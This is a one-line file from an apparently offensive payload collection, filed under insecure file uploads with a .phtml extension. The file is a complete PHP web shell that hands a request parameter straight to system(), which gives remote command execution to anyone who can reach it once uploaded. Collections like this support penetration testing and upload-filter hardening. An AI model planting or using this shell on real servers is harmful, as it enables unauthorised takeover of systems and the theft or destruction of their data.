PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.phtml

1 line
43 B
PHTML
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>